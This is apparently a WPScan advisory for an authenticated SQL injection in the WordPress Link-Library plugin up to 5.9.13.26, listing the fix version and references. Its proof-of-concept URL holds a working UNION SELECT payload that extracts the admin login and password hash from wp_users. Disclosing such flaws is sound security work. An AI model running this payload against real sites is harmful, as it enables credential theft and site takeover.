Link-Library <= 5.9.13.26 – Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: admin user.

$_GET[‘linkid’] is not escaped.
Proof of Concept
http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(user_login,char(58),user_pass),17,18,19,20,21,22,23,24,25,26+FROM+wp_users+WHERE+ID=1

Affects Plugin

fixed in version 5.9.13.27

References

URL http://lenonleite.com.br/en/blog/2017/08/14/link-library-5-9-13-26-plugin-wordpress-sql-injection/
URL https://plugins.trac.wordpress.org/changeset/1713187/link-library

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite / Log.pt
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 7
Verified No
WPVDB ID 8886

Timeline

Publicly Published 2017-08-14 (3 months ago)
Added 2017-08-16 (3 months ago)
Last Updated 2017-08-16 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.